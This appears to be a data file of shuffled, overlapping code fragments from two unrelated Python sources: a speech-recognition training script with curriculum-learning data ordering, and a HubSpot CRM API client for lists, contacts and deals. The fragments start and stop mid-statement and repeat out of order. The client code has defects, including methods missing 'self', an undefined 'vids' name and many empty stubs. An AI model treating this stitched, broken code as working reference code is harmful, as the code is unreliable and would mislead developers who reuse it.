which takes feedback from model and reshuffles the", "if order.strip() == '': continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids(", "\"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"],", "# # if cnt == 5: # # exit() # cnt += 1", "run this recipe, do the following: > python train.py hparams/transformer.yaml > python train.py", "Transformer language model is used on the top of decoder probabilities. The neural", "== \"asc\" else -1 if key == \"input_length\": res = self._input_length_comparator(key1,key2) elif key", "resume training if interrupted if self.checkpointer is not None: # do not reload", "trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], )", "key, limit in key_max_value.items(): if computed[key] <= limit: continue return False for key,", "optimizer by default if they have trainable parameters, and will have ``train()``/``eval()`` called", "``-1``. \"\"\" def __init__( self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ):", "key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a filtered", "open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) # save the averaged checkpoint at the end", "based on specified curriculum, shares static data. The reason to implement these operations", "opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) # save attributes related to curriculum learning self.inter_epoch_dataset_updation", "this will be used to load checkpoints, and will have the optimizer added", "pass elif batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering", "data_point if bool(func(data_point[key])) == True min_weight : None, int If not None, will" ]
[ "pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id + '/contacts/all'", "} payload = ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST', url, data=payload,", "deal def get_deal_owner_by_id(): # check deal id or owner id pass def create_deal():", "self.hub_id = hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass", "querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': True,", "querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request(", "'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response =", ") print(response.text) def create_dynamic_list(): url = self._lists_url querystring = { 'hapikey': '<KEY>', }", "##### CONTACT APIS ##### def get_contact_by_id(): pass # read all companies def get_all_contacts():", "params=querystring ) print(response.text) # create contact def create_contact(): pass # update contact def", "params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' +", "create contact def create_contact(): pass # update contact def update_contact(): pass # deleting", "create_dynamic_list(): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({", "check deal id or owner id pass def create_deal(): pass def associate_contact_to_deal(): pass", "def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id():", "def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def get_contact_by_id(): pass", "} payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], })", "def get_all_static_lists(): url = self._lists_url querystring = { 'offset': '0', 'count': '10', 'hapikey':", "False, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring", "} response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url =", "add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' + list_id + '/add' querystring", "data=payload, params=querystring ) print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url =", "import ujson # from b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token):", "CONTACT APIS ##### def get_contact_by_id(): pass # read all companies def get_all_contacts(): url", "def update_contact(): pass # deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass #####", "def get_account_by_id(): pass # read all companies def get_all_accounts(): pass # create company", "get_account_by_id(): pass # read all companies def get_all_accounts(): pass # create company in", "'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST',", ") print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring = { 'hapikey': '<KEY>',", "def update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS", "= self._lists_url + '/dynamic' querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>',", "'0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring )", "data=payload, params=querystring ) print(response.text) ##### DEAL APIS ##### # create deal def get_deal_owner_by_id():", "list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url,", "pass # read all companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring", "list_id querystring = { 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring", "pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): # yes pass def", "def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass # read all", "delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id +", "get_contact_by_id(): pass # read all companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all'", "def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def get_contact_by_id(): pass # read all", "= requests.request( 'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url =", "= { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId':", "print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring = { 'hapikey': '<KEY>', }", "'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST',", "self._lists_url + '/' + list_id + '/add' querystring = { 'hapikey': '<KEY>', }", "'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url = self._lists_url querystring =", "create_static_list(self, list_name): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload =", "} payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], })", "[], }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list():", "pass def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass # read", "def create_account(): pass # update company def update_account(): # pass def add_contact_to_account(): pass", "hubspot def create_account(): pass # update company def update_account(): # pass def add_contact_to_account():", "'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring", "data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url = self._lists_url querystring = { 'hapikey':", "self._lists_url querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response =", "get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id + '/contacts/all' querystring =", "= requests.request( 'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url", "# deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS #####", "'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists():", "pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' +", "pass # read all companies def get_all_accounts(): pass # create company in hubspot", "querystring = { 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring )", "5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text)", "'<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [],", ") print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url +", "url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url = self._lists_url + '/' +", "'dynamic': False, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload,", "get_list_by_id(self, list_id): url = self._lists_url + '/' + list_id querystring = { 'hapikey':", "= ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response =", "# from b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id =", "def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id", "querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': False,", "class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token", "url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring =", "= self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>',", "def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists(): url", "b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token", "associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): # yes pass def test(): pass", "payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], }) response", "update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass # read all companies", "##### LISTS APIS ##### def get_all_static_lists(): url = self._lists_url querystring = { 'offset':", "= self._lists_url + '/' + list_id querystring = { 'hapikey': '<KEY>', } response", "'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring =", "'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS #####", "'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring", "'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters':", "'/add' querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids })", "def get_contact_by_id(): pass # read all companies def get_all_contacts(): url = self._lists_url +", "get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists(): url = self._lists_url querystring =", "} response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url", "all companies def get_all_accounts(): pass # create company in hubspot def create_account(): pass", "APIS ##### def get_account_by_id(): pass # read all companies def get_all_accounts(): pass #", "url = self._lists_url + '/' + list_id + '/contacts/all' querystring = { 'vidOffset':", "list_id + '/contacts/all' querystring = { 'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', }", "def create_contact(): pass # update contact def update_contact(): pass # deleting contact def", "{ 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def", "payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response", "= self._lists_url querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response", "or owner id pass def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass", "pass def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS ##### def", "= requests.request( 'GET', url, params=querystring ) print(response.text) # create contact def create_contact(): pass", "def get_deal_owner_by_id(): # check deal id or owner id pass def create_deal(): pass", "'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text)", "def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' + list_id + '/add'", "deal id or owner id pass def create_deal(): pass def associate_contact_to_deal(): pass def", "= { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET',", "requests import ujson # from b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id,", "'<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id):", "get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass", "'GET', url, params=querystring ) print(response.text) # create contact def create_contact(): pass # update", "hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self,", "url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey':", "= hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def", "update_contact(): pass # deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS", "pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): #", "pass # deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS", "##### ACCOUNT APIS ##### def get_account_by_id(): pass # read all companies def get_all_accounts():", "querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids }) response", "__init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url", "all companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset':", "{ 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url,", "= requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) pass def delete_list(): pass def", "requests.request( 'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring", "'<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [],", "CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token", "'/' + list_id querystring = { 'hapikey': '<KEY>', } response = requests.request( 'GET',", "url, params=querystring ) print(response.text) # create contact def create_contact(): pass # update contact", "get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10',", "self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT", "def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token)", "companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0',", "'100', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def", "print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' + list_id +", "url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name':", "def create_dynamic_list(): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload =", ") print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring = { 'offset':", "payload = ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST', url, data=payload, params=querystring", "id pass def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal():", "= { 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text)", "url, data=payload, params=querystring ) print(response.text) ##### DEAL APIS ##### # create deal def", "'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) # create", "in hubspot def create_account(): pass # update company def update_account(): # pass def", ") print(response.text) # create contact def create_contact(): pass # update contact def update_contact():", "= self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token(): pass", "= requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) ##### DEAL APIS ##### #", "response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url =", "True, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring", "refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass #", "pass def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass", "'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) pass", "# read all companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring =", "ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response = requests.request(", "update company def update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass #####", "update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS #####", "pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass # read all companies def", "create deal def get_deal_owner_by_id(): # check deal id or owner id pass def", "get_deal_owner_by_id(): # check deal id or owner id pass def create_deal(): pass def", "'/' + list_id + '/contacts/all' querystring = { 'vidOffset': '0', 'count': '100', 'hapikey':", "pass def get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists(): url = self._lists_url", "ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text)", "self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', }", "'count': '100', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text)", "url, params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring = {", "##### # create deal def get_deal_owner_by_id(): # check deal id or owner id", "company in hubspot def create_account(): pass # update company def update_account(): # pass", "create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner():", "requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url = self._lists_url +", "= { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET',", "# pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def", "'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self,", "'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url +", "def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count':", "def get_list_by_id(self, list_id): url = self._lists_url + '/' + list_id querystring = {", "print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring = { 'offset': '0',", "self._lists_url querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic':", "Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token =", "'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring", "response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) ##### DEAL APIS #####", "list_id): url = self._lists_url + '/' + list_id querystring = { 'hapikey': '<KEY>',", "params=querystring ) print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url", "# create deal def get_deal_owner_by_id(): # check deal id or owner id pass", "def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def", "'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) def", "APIS ##### # create deal def get_deal_owner_by_id(): # check deal id or owner", "list_id): url = self._lists_url + '/' + list_id + '/contacts/all' querystring = {", "+ '/' + list_id + '/add' querystring = { 'hapikey': '<KEY>', } payload", "response = requests.request( 'GET', url, params=querystring ) print(response.text) # create contact def create_contact():", "ujson # from b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id", "company def update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT", "DEAL APIS ##### # create deal def get_deal_owner_by_id(): # check deal id or", "list_id + '/add' querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ vids:", "url = self._lists_url + '/' + list_id querystring = { 'hapikey': '<KEY>', }", "print(response.text) ##### DEAL APIS ##### # create deal def get_deal_owner_by_id(): # check deal", "} response = requests.request( 'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids):", "##### def get_contact_by_id(): pass # read all companies def get_all_contacts(): url = self._lists_url", "url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/'", "pass # create company in hubspot def create_account(): pass # update company def", "+ '/dynamic' querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response", "create company in hubspot def create_account(): pass # update company def update_account(): #", "requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) ##### DEAL APIS ##### # create", "'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def create_static_list(self,", "= { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId':", "import requests import ujson # from b2b_app.config import CONFIG class Hubspot: def __init__(self,", "'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST',", "'10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def", "= { 'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids }) response =", "list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url,", "contact def create_contact(): pass # update contact def update_contact(): pass # deleting contact", "+ 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response", "'/dynamic' querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response =", "+ list_id + '/contacts/all' querystring = { 'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>',", "pass ##### LISTS APIS ##### def get_all_static_lists(): url = self._lists_url querystring = {", "import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token =", "print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/'", "ACCOUNT APIS ##### def get_account_by_id(): pass # read all companies def get_all_accounts(): pass", "{ 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356,", "from b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id", "array_of_ids }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) ##### DEAL", "deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def", "response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url =", "def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): # yes", "print(response.text) def get_list_by_id(self, list_id): url = self._lists_url + '/' + list_id querystring =", "response = requests.request( 'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name): url =", "response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) pass def delete_list(): pass", "= requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url = self._lists_url", "url = self._lists_url + '/dynamic' querystring = { 'offset': '0', 'count': '10', 'hapikey':", "params=querystring ) print(response.text) ##### DEAL APIS ##### # create deal def get_deal_owner_by_id(): #", "} response = requests.request( 'GET', url, params=querystring ) print(response.text) # create contact def", "'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring", "= ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST', url, data=payload, params=querystring )", "url = self._lists_url + '/' + list_id + '/add' querystring = { 'hapikey':", "def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring = { 'offset': '0', 'count':", "read all companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = {", "contact def update_contact(): pass # deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass", "# create contact def create_contact(): pass # update contact def update_contact(): pass #", "'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url = self._lists_url + '/'", "{ 'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', } response = requests.request( 'GET', url,", "= self._lists_url + '/' + list_id + '/contacts/all' querystring = { 'vidOffset': '0',", "+ '/contacts/all' querystring = { 'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', } response", "##### def get_all_static_lists(): url = self._lists_url querystring = { 'offset': '0', 'count': '10',", "get_all_accounts(): pass # create company in hubspot def create_account(): pass # update company", "create_account(): pass # update company def update_account(): # pass def add_contact_to_account(): pass def", "requests.request( 'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url", "print(response.text) def create_dynamic_list(): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload", "pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def get_contact_by_id():", "{ 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356,", "pass def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def get_contact_by_id(): pass # read", ") print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' + list_id", "= ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], }) response =", "= self._lists_url querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name,", "refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def", "delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists(): url =", "LISTS APIS ##### def get_all_static_lists(): url = self._lists_url querystring = { 'offset': '0',", "self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token):", "+ list_id querystring = { 'hapikey': '<KEY>', } response = requests.request( 'GET', url,", "vids: array_of_ids }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) #####", "associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): # yes pass", "# update contact def update_contact(): pass # deleting contact def delete_contact(): pass def", "# update company def update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass", "owner id pass def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def", "= refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass", "params=querystring ) print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring = {", "self._lists_url + '/dynamic' querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', }", "}) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url", "}) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) ##### DEAL APIS", "self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token():", "self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token(): pass #####", "hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url =", "'<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name):", "ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], }) response = requests.request(", "+ list_id + '/add' querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({", "def get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists(): url = self._lists_url querystring", "read all companies def get_all_accounts(): pass # create company in hubspot def create_account():", "url = self._lists_url querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', }", "querystring = { 'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', } response = requests.request(", "get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring = { 'offset': '0', 'count': '10',", "print(response.text) # create contact def create_contact(): pass # update contact def update_contact(): pass", "##### DEAL APIS ##### # create deal def get_deal_owner_by_id(): # check deal id", "params=querystring ) print(response.text) def get_list_by_id(self, list_id): url = self._lists_url + '/' + list_id", "list_id, array_of_ids): url = self._lists_url + '/' + list_id + '/add' querystring =", "def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): # yes pass def test():", "'dynamic': True, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload,", "self._lists_url + '/' + list_id querystring = { 'hapikey': '<KEY>', } response =", "def get_all_accounts(): pass # create company in hubspot def create_account(): pass # update", "} response = requests.request( 'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name): url", "requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url = self._lists_url querystring", "= self._lists_url + '/' + list_id + '/add' querystring = { 'hapikey': '<KEY>',", "url, data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url = self._lists_url querystring = {", "def create_static_list(self, list_name): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload", "contact def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists():", "'<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url", "'POST', url, 